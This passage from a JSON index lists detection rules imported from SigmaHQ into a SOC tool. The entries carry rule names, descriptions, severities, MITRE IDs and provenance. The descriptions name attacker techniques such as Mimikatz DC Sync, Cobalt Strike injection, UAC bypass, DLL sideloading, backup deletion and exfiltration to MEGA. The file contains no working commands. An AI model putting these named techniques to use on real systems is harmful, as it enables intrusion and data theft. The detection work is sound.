VPN Connection Modified or Deleted", "description": "Identifies when a VPN connection is modified or deleted.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/azure-vpn-connection-modified-or-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "61171ffc-d79c-4ae5-8e10-9323dba19cd3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/activity_logs/azure_vpn_connection_modified_or_deleted.yml" } }, { "id": "sigmahq-sigma-611eab06-a145-4dfa-a295-3ccc5c20f59a", "type": "detection", "name": "Mimikatz DC Sync", "description": "Detects Mimikatz DC sync security events", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.006" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/mimikatz-dc-sync.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "611eab06-a145-4dfa-a295-3ccc5c20f59a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_dcsync.yml" } }, { "id": "sigmahq-sigma-6120ac2a-a34b-42c0-a9bd-1fb9f459f348", "type": "detection", "name": "AddinUtil.EXE Execution From Uncommon Directory", "description": "Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) from a non-standard directory.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/addinutil-exe-execution-from-uncommon-directory.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6120ac2a-a34b-42c0-a9bd-1fb9f459f348", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_addinutil_uncommon_dir_exec.yml" } }, { "id": "sigmahq-sigma-612e47e9-8a59-43a6-b404-f48683f45bd6", "type": "detection", "name": "ServiceDll Hijack", "description": "Detects changes to the \"ServiceDLL\" value related to a service in the registry.\nThis is often used as a method of persistence.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1543.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/servicedll-hijack.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "612e47e9-8a59-43a6-b404-f48683f45bd6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_servicedll_hijack.yml" } }, { "id": "sigmahq-sigma-613c03ba-0779-4a53-8a1f-47f914a4ded3", "type": "detection", "name": "DNS Query To MEGA Hosting Website", "description": "Detects DNS queries for subdomains related to MEGA sharing website", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1567.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dns-query-to-mega-hosting-website.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "613c03ba-0779-4a53-8a1f-47f914a4ded3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/dns_query/dns_query_win_mega_nz.yml" } }, { "id": "sigmahq-sigma-614a7e17-5643-4d89-b6fe-f9df1a79641c", "type": "detection", "name": "Wmiprvse Wbemcomn DLL Hijack - File", "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network and loading it for a WMI DLL Hijack scenario.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1047", "T1021.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/wmiprvse-wbemcomn-dll-hijack-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "614a7e17-5643-4d89-b6fe-f9df1a79641c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_wmiprvse_wbemcomn_dll_hijack.yml" } }, { "id": "sigmahq-sigma-614cf376-6651-47c4-9dcc-6b9527f749f4", "type": "detection", "name": "Suspicious Scheduled Task Update", "description": "Detects update to a scheduled task event that contain suspicious keywords.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1053.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-scheduled-task-update.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "614cf376-6651-47c4-9dcc-6b9527f749f4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_susp_scheduled_task_update.yml" } }, { "id": "sigmahq-sigma-61a7697c-cb79-42a8-a2ff-5f0cdfae0130", "type": "detection", "name": "Potential CobaltStrike Service Installations - Registry", "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1021.002", "T1543.003", "T1569.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-cobaltstrike-service-installations-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "61a7697c-cb79-42a8-a2ff-5f0cdfae0130", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_cobaltstrike_service_installs.yml" } }, { "id": "sigmahq-sigma-61d0475c-173f-4844-86f7-f3eebae1c66b", "type": "detection", "name": "Change PowerShell Policies to an Insecure Level - PowerShell", "description": "Detects changing the PowerShell script execution policy to a potentially insecure level using the \"Set-ExecutionPolicy\" cmdlet.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/change-powershell-policies-to-an-insecure-level-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "61d0475c-173f-4844-86f7-f3eebae1c66b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_set_policies_to_unsecure_level.yml" } }, { "id": "sigmahq-sigma-62120148-6b7a-42be-8b91-271c04e281a3", "type": "detection", "name": "Suspicious Camera and Microphone Access", "description": "Detects Processes accessing the camera and microphone from suspicious folder", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1125", "T1123" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-camera-and-microphone-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "62120148-6b7a-42be-8b91-271c04e281a3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_event/registry_event_susp_mic_cam_access.yml" } }, { "id": "sigmahq-sigma-6225c53a-a96e-4235-b28f-8d7997cd96eb", "type": "detection", "name": "Hypervisor-protected Code Integrity (HVCI) Related Registry Tampering Via CommandLine", "description": "Detects the tampering of Hypervisor-protected Code Integrity (HVCI) related registry values via command line tool reg.exe.\nHVCI uses virtualization-based security to protect code integrity by ensuring that only trusted code can run in kernel mode.\nAdversaries may tamper with HVCI to load malicious or unsigned drivers, which can be used to escalate privileges, maintain persistence, or evade security mechanisms.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hypervisor-protected-code-integrity-hvci-related-registry-tampering-via-commandl.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6225c53a-a96e-4235-b28f-8d7997cd96eb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hvci_registry_tampering.yml" } }, { "id": "sigmahq-sigma-62510e69-616b-4078-b371-847da438cc03", "type": "detection", "name": "Share And Session Enumeration Using Net.EXE", "description": "Detects attempts to enumerate file shares, printer shares and sessions using \"net.exe\" with the \"view\" flag.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "endpoint", "mitre_techniques": [ "T1018" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/share-and-session-enumeration-using-net-exe.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "62510e69-616b-4078-b371-847da438cc03", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_net_view_share_and_sessions_enum.yml" } }, { "id": "sigmahq-sigma-62b20d44-1546-4e61-afce-8e175eb9473c", "type": "detection", "name": "Service StartupType Change Via PowerShell Set-Service", "description": "Detects the use of the PowerShell \"Set-Service\" cmdlet to change the startup type of a service to \"disabled\" or \"manual\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/service-startuptype-change-via-powershell-set-service.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "62b20d44-1546-4e61-afce-8e175eb9473c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_set_service_disabled.yml" } }, { "id": "sigmahq-sigma-62b7ccc9-23b4-471e-aa15-6da3663c4d59", "type": "detection", "name": "PowerShell Base64 Encoded Reflective Assembly Load", "description": "Detects base64 encoded .NET reflective loading of Assembly", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1027", "T1620" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-base64-encoded-reflective-assembly-load.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "62b7ccc9-23b4-471e-aa15-6da3663c4d59", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_base64_reflection_assembly_load.yml" } }, { "id": "sigmahq-sigma-62e0298b-e994-4189-bc87-bc699aa62d97", "type": "detection", "name": "Potential Suspicious Registry File Imported Via Reg.EXE", "description": "Detects the import of '.reg' files from suspicious paths using the 'reg.exe' utility", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-suspicious-registry-file-imported-via-reg-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "62e0298b-e994-4189-bc87-bc699aa62d97", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_reg_import_from_suspicious_paths.yml" } }, { "id": "sigmahq-sigma-62ed5b55-f991-406a-85d9-e8e8fdf18789", "type": "detection", "name": "UAC Bypass Using Consent and Comctl32 - File", "description": "Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uac-bypass-using-consent-and-comctl32-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "62ed5b55-f991-406a-85d9-e8e8fdf18789", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_uac_bypass_consent_comctl32.yml" } }, { "id": "sigmahq-sigma-62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c", "type": "detection", "name": "Tor Client/Browser Execution", "description": "Detects the use of Tor or Tor-Browser to connect to onion routing networks", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1090.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/tor-client-browser-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_browsers_tor_execution.yml" } }, { "id": "sigmahq-sigma-62fff148-278d-497e-8ecd-ad6083231a35", "type": "detection", "name": "OneLogin User Assumed Another User", "description": "Detects when an user assumed another user account.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/onelogin-user-assumed-another-user.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "62fff148-278d-497e-8ecd-ad6083231a35", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/identity/onelogin/onelogin_assumed_another_user.yml" } }, { "id": "sigmahq-sigma-6309645e-122d-4c5b-bb2b-22e4f9c2fa42", "type": "detection", "name": "HackTool - Potential CobaltStrike Process Injection", "description": "Detects a potential remote threat creation with certain characteristics which are typical for Cobalt Strike beacons", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1055.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-potential-cobaltstrike-process-injection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6309645e-122d-4c5b-bb2b-22e4f9c2fa42", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/create_remote_thread/create_remote_thread_win_hktl_cobaltstrike.yml" } }, { "id": "sigmahq-sigma-631b22a4-70f4-4e2f-9ea8-42f84d9df6d8", "type": "detection", "name": "Suspicious AddinUtil.EXE CommandLine Execution", "description": "Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) with suspicious Addinroot or Pipelineroot paths. An adversary may execute AddinUtil.exe with uncommon Addinroot/Pipelineroot paths that point to the adversaries Addins.Store payload.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-addinutil-exe-commandline-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "631b22a4-70f4-4e2f-9ea8-42f84d9df6d8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_addinutil_suspicious_cmdline.yml" } }, { "id": "sigmahq-sigma-6331d09b-4785-4c13-980f-f96661356249", "type": "detection", "name": "PowerShell Downgrade Attack - PowerShell", "description": "Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-downgrade-attack-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6331d09b-4785-4c13-980f-f96661356249", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_classic/posh_pc_downgrade_attack.yml" } }, { "id": "sigmahq-sigma-6345b048-8441-43a7-9bed-541133633d7a", "type": "detection", "name": "ManageEngine Endpoint Central Dctask64.EXE Potential Abuse", "description": "Detects the execution of \"dctask64.exe\", a signed binary by ZOHO Corporation part of ManageEngine Endpoint Central.\nThis binary can be abused for DLL injection, arbitrary command and process execution.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1055.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/manageengine-endpoint-central-dctask64-exe-potential-abuse.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6345b048-8441-43a7-9bed-541133633d7a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_dctask64_arbitrary_command_and_dll_execution.yml" } }, { "id": "sigmahq-sigma-634b00d5-ccc3-4a06-ae3b-0ec8444dd51b", "type": "detection", "name": "Malicious Windows Script Components File Execution by TAEF Detection", "description": "Windows Test Authoring and Execution Framework (TAEF) framework allows you to run automation by executing tests files written on different languages (C, C#, Microsoft COM Scripting interfaces\nAdversaries may execute malicious code (such as WSC file with VBScript, dll and so on) directly by running te.exe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/malicious-windows-script-components-file-execution-by-taef-detection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "634b00d5-ccc3-4a06-ae3b-0ec8444dd51b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_use_of_te_bin.yml" } }, { "id": "sigmahq-sigma-6360757a-d460-456c-8b13-74cf0e60cceb", "type": "detection", "name": "Potential DLL Sideloading Via comctl32.dll", "description": "Detects potential DLL sideloading using comctl32.dll to obtain system privileges", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-dll-sideloading-via-comctl32-dll.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6360757a-d460-456c-8b13-74cf0e60cceb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_comctl32.yml" } }, { "id": "sigmahq-sigma-63647769-326d-4dde-a419-b925cc0caf42", "type": "detection", "name": "Enable Microsoft Dynamic Data Exchange", "description": "Enable Dynamic Data Exchange protocol (DDE) in all supported editions of Microsoft Word or Excel.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1559.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/enable-microsoft-dynamic-data-exchange.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "63647769-326d-4dde-a419-b925cc0caf42", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_office_enable_dde.yml" } }, { "id": "sigmahq-sigma-636e30d5-3736-42ea-96b1-e6e2f8429fd6", "type": "detection", "name": "Azure Owner Removed From Application or Service Principal", "description": "Identifies when a owner is was removed from a application or service principal in Azure.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/azure-owner-removed-from-application-or-service-principal.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "636e30d5-3736-42ea-96b1-e6e2f8429fd6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/activity_logs/azure_owner_removed_from_application_or_service_principal.yml" } }, { "id": "sigmahq-sigma-637f689e-b4a5-4a86-be0e-0100a0a33ba2", "type": "detection", "name": "HackTool - EfsPotato Named Pipe Creation", "description": "Detects the pattern of a pipe name as used by the hack tool EfsPotato", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1055" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-efspotato-named-pipe-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "637f689e-b4a5-4a86-be0e-0100a0a33ba2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/pipe_created/pipe_created_hktl_efspotato.yml" } }, { "id": "sigmahq-sigma-6385697e-9f1b-40bd-8817-f4a91f40508e", "type": "detection", "name": "PowerShell Base64 Encoded Invoke Keyword", "description": "Detects UTF-8 and UTF-16 Base64 encoded powershell 'Invoke-' calls", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1027" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-base64-encoded-invoke-keyword.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6385697e-9f1b-40bd-8817-f4a91f40508e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_base64_invoke.yml" } }, { "id": "sigmahq-sigma-6393e346-1977-46ef-8987-ad414a145fad", "type": "detection", "name": "AWS ConsoleLogin Failed Authentication", "description": "Detects failed AWS console login attempts due to authentication failures. Monitoring these events is crucial for identifying potential brute-force attacks or unauthorized access attempts to AWS accounts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/aws-consolelogin-failed-authentication.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6393e346-1977-46ef-8987-ad414a145fad", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_cloudtrail_console_login_failed_authentication.yml" } }, { "id": "sigmahq-sigma-639c9081-f482-47d3-a0bd-ddee3d4ecd76", "type": "detection", "name": "All Backups Deleted Via Wbadmin.EXE", "description": "Detects the deletion of all backups or system state backups via \"wbadmin.exe\".\nThis technique is used by numerous ransomware families and actors.\nThis may only be successful on server platforms that have Windows Backup enabled.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1490" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/all-backups-deleted-via-wbadmin-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "639c9081-f482-47d3-a0bd-ddee3d4ecd76", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wbadmin_delete_all_backups.yml" } }, { "id": "sigmahq-sigma-63bf8794-9917-45bc-88dd-e1b5abc0ecfd", "type": "detection", "name": "Powershell Install a DLL in System Directory", "description": "Uses PowerShell to install/copy a file into a system directory such as \"System32\" or \"SysWOW64\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1556.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-install-a-dll-in-system-directory.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", 